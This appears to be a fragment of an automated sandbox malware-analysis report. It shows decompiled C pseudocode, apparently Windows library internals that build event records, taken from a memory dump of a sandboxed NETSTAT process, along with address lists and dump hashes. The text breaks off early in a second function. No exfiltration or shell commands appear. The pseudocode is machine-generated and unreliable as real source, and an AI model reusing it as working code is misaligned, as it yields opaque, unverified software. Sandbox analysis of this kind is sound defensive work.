				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x2f41178);
				E02EBD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E02F34C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E02EAD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E02F35542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x2f560e8;
								if( *0x2f560e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x2f560e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E02EA9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E02EA6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E02EAF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E02EAF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E02EAF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E02EAFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E02EAFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E02EAF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E02EAF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E02F34CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E02EBD130(_t427, _t494, _t511);
				}
			}

0x02f35ba5
0x02f35baa
0x02f35baf
0x02f35bb4
0x02f35bb6
0x02f35bbc
0x02f35bbe
0x02f35bc4
0x02f35bcd
0x02f35bd3
0x02f35bd6
0x02f35bdc
0x02f35be0
0x02f35be3
0x02f35beb
0x02f35bf2
0x02f35bf8
0x02f35bfe
0x02f35c04
0x02f35c0e
0x02f35c18
0x02f35c1f
0x02f35c25
0x02f35c2a
0x02f35c2c
0x02f35c32
0x02f35c3a
0x02f35c3f
0x02f35c42
0x02f35c48
0x02f35c5b
0x02f35c5b
0x02f35c2c
0x02f35cb7
0x02f35cb9
0x02f35cbf
0x02f35cc2
0x02f35cca
0x02f35ccb
0x02f35ccb
0x02f35cd1
0x02f35cd7
0x02f35cda
0x02f35ce1
0x02f35ce4
0x02f35ce7
0x02f35ced
0x02f35cf3
0x02f35cf9
0x02f35cff
0x02f35d08
0x02f35d0a
0x02f35d0e
0x02f35d10
0x00000000
0x00000000
0x02f35d16
0x02f35d1a
0x00000000
0x00000000
0x02f35d20
0x02f35d22
0x02f35d25
0x02f35d2f
0x02f35d2f
0x02f35d33
0x02f35d3d
0x02f35d49
0x02f35d4b
0x00000000
0x00000000
0x02f35d5a
0x02f35d5d
0x02f35d60
0x00000000
0x00000000
0x02f35d66
0x02f35d69
0x00000000
0x00000000
0x02f35d6f
0x02f35d6f
0x02f35d73
0x02f35d79
0x02f35d7f
0x02f35d86
0x02f35d95
0x02f35d98
0x02f35dba
0x02f35dcb
0x02f35dce
0x02f35dd3
0x02f35dd6
0x02f35dd8
0x02f35de6
0x02f35dec
0x02f35dee
0x02f35df1
0x02f35df3
0x02f3635a
0x02f3635a
0x00000000
0x02f3635a
0x02f35dfe
0x02f35e02
0x02f35e05
0x02f35e07
0x02f35e10
0x02f35e13
0x02f35e1b
0x02f35e1c
0x02f35e21
0x02f35e22
0x02f35e23
0x02f35e25
0x02f35e2a
0x02f35e2c
0x02f35e2e
0x02f35e36
0x02f35e39
0x02f35e42
0x02f35e47
0x02f35e4d
0x02f35e54
0x02f35e54
0x02f35e54
0x02f35e2e
0x02f35e5c
0x02f35e5f
0x02f35e62
0x02f35e64
0x02f35e6b
0x02f35e70
0x02f35e7a
0x02f35e7a
0x02f35e7a
0x02f35e6b
0x02f35e7e
0x02f35e7f
0x02f35e7f
0x02f35e81
0x02f35e87
0x02f35e8b
0x02f35e8c
0x02f35e8c
0x02f35e8c
0x02f35e9a
0x02f35e9c
0x02f35ea2
0x02f35ea6
0x02f35f50
0x02f35f50
0x02f35f57
0x02f35f66
0x02f35f66
0x02f35f66
0x02f35f68
0x02f35f6a
0x02f363d0
0x00000000
0x02f35f70
0x02f35f70
0x02f35f91
0x02f35f9c
0x02f35f9e
0x02f35fa4
0x02f35fa6
0x02f3638c
0x02f36392
0x02f363a1
0x02f363a7
0x02f363af
0x02f363af
0x02f363bd
0x02f363d8
0x00000000
0x02f363d8
0x02f35fac
0x02f35fb2
0x02f35fb4
0x02f35fbd
0x02f35fc6
0x02f35fce
0x02f35fd4
0x02f35fdc
0x02f35fec
0x02f35fed
0x02f35fee
0x02f35fef
0x02f35ff9
0x02f35ffa
0x02f35ffb
0x02f35ffc
0x02f36000
0x02f36004
0x02f36012
0x02f36012
0x02f36018
0x02f36019
0x02f3601a
0x02f3601b
0x02f3601c
0x02f36020
0x02f36059
0x02f3605c
0x02f36061
0x02f36061
0x02f36022
0x02f36022
0x02f36022
0x02f36025
0x02f3602a
0x02f3602b
0x02f36031
0x02f36037
0x02f36038
0x02f3603e
0x02f36048
0x02f36049
0x02f3604a
0x02f3604b
0x02f3604c
0x02f3604d
0x02f36053
0x02f36054
0x02f36054
0x02f36062
0x02f36065
0x02f36067
0x02f3606a
0x02f36070
0x02f36075
0x02f36076
0x02f36081
0x02f36087
0x02f36095
0x02f36099
0x02f3609e
0x02f360a4
0x02f360ae
0x02f360b0
0x02f360b3
0x02f360b6
0x02f360b8
0x02f360ba
0x02f360ba
0x02f360ba
0x02f360ba
0x02f360be
0x02f360c0
0x02f360c5
0x02f360c5
0x02f360c5
0x02f360c6
0x02f360cd
0x02f36114
0x02f360cf
0x02f360cf
0x02f360d4
0x02f360d5
0x02f360da
0x02f360db
0x02f360e1
0x02f360e2
0x02f360e8
0x02f360f8
0x02f360fd
0x02f360fe
0x02f36102
0x02f36104
0x02f36107
0x02f36109
0x02f3610b
0x02f3610b
0x02f3610b
0x02f3610b
0x02f3610f
0x02f3610f
0x02f36117
0x02f3611a
0x02f3611f
0x02f36125
0x02f36134
0x02f36139
0x02f3613f
0x02f36146
0x02f36148
0x02f3614b
0x02f3614d
0x02f3614f
0x02f3614f
0x02f3614f
0x02f3614f
0x02f36153
0x02f36159
0x02f36159
0x02f3615c
0x02f36163
0x02f36169
0x02f3616c
0x02f36172
0x02f36181
0x02f36186
0x02f36187
0x02f3618b
0x02f36191
0x02f36195
0x02f361a3
0x02f361bb
0x02f361c0
0x02f361c3
0x02f361cc
0x02f361d0
0x02f361dc
0x02f361de
0x02f361e1
0x02f361e4
0x02f361e6
0x02f361e8
0x02f361e8
0x02f361e8
0x02f361e8
0x02f361e6
0x02f361ec
0x02f361f3
0x02f36203
0x02f36209
0x02f3620a
0x02f36216
0x02f3621d
0x02f36227
0x02f36241
0x02f36246
0x02f3624c
0x02f36257
0x02f36259
0x02f3625c
0x02f3625e
0x02f36260
0x02f36260
0x02f36260
0x02f36260
0x02f3625e
0x02f36264
0x02f36267
0x02f36269
0x02f36315
0x02f36315
0x02f3631b
0x02f3631e
0x02f36324
0x02f36327
0x02f3632f
0x02f36330
0x02f36333
0x02f3633a
0x02f3633c
0x02f36335
0x02f36335
0x02f36335
0x02f3633f
0x02f36342
0x02f3634c
0x02f36352
0x02f36355
0x02f36355
0x02f36359
0x00000000
0x02f3626f
0x02f36275
0x02f36275
0x02f36278
0x02f3627e
0x02f3627e
0x02f36281
0x02f36287
0x02f3628d
0x02f36298
0x02f3629c
0x02f362a2
0x02f3629e
0x02f3629e
0x02f3629e
0x02f362a7
0x02f362a7
0x02f362aa
0x02f362b0
0x02f362f0
0x02f362f0
0x02f362f2
0x02f362f8
0x02f362fd
0x02f362b2
0x02f362b2
0x02f362b2
0x02f362b5
0x02f362dd
0x02f362e2
0x02f362e5
0x02f362b7
0x02f362b8
0x02f362bb
0x02f362bd
0x02f362c0
0x02f362c4
0x02f362cd
0x02f362cd
0x02f362c0
0x02f362bb
0x02f362b5
0x02f36302
0x02f36303
0x02f36305
0x02f36305
0x02f36305
0x02f3630c
0x02f3630c
0x00000000
0x02f3627e
0x02f36269
0x02f35eac
0x02f35ebb
0x02f35ebe
0x02f35ecb
0x02f35ecb
0x02f35ece
0x02f35ece
0x02f35ed4
0x02f35ed7
0x02f35ed9
0x02f35edb
0x02f35edb
0x02f35ee1
0x02f35ee1
0x02f35ee3
0x02f35f20
0x02f35f20
0x02f35ee5
0x02f35ee5
0x02f35ee5
0x02f35ee8
0x02f35f11
0x02f35f18
0x02f35eea
0x02f35eea
0x02f35eed
0x02f35ef2
0x02f35ef8
0x02f35efb
0x02f35f0a
0x02f35f0a
0x02f35eed
0x02f35ee8
0x02f35f22
0x02f35f28
0x00000000
0x00000000
0x02f35f30
0x02f35f31
0x02f35f37
0x02f35f3a
0x02f35f3d
0x02f35f44
0x00000000
0x00000000
0x00000000
0x02f35f46
0x02f35f48
0x02f35f4d
0x00000000
0x02f35f4d
0x02f35dda
0x02f35ddf
0x00000000
0x02f35ddf
0x02f35dd8
0x02f35da7
0x02f35da9
0x02f35dac
0x02f35dae
0x00000000
0x02f35db4
0x02f35db4
0x00000000
0x02f35db4
0x02f35dae
0x02f35d88
0x02f35d8d
0x02f36363
0x02f36369
0x02f3636a
0x02f36370
0x02f36372
0x02f3637a
0x02f3637b
0x02f3637d
0x00000000
0x00000000
0x02f3637f
0x02f36385
0x00000000
0x02f36385
0x02f35d38
0x02f35d3b
0x00000000
0x00000000
0x00000000
0x02f35d3b
0x02f35d27
0x02f35d29
0x00000000
0x00000000
0x00000000
0x02f36360
0x00000000
0x02f36360
0x02f35c10
0x02f35c10
0x02f363da
0x02f363e5
0x02f363e5

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7623b0a33ac21bb256bcf233ea17b5270606b005aeb9e1ee0e731cd3391034a4
Instruction ID: 768d81534694207d1564b9ec8ffc0654300ac69621d467b63c7e7e59e33eb7c3
Opcode Fuzzy Hash: 7623b0a33ac21bb256bcf233ea17b5270606b005aeb9e1ee0e731cd3391034a4
Instruction Fuzzy Hash: 0B425771E002299FDB21CF68C880BA9B7B5FF49344F1481AADA5DEB342D734A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02E84120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02E84120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x2f5d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
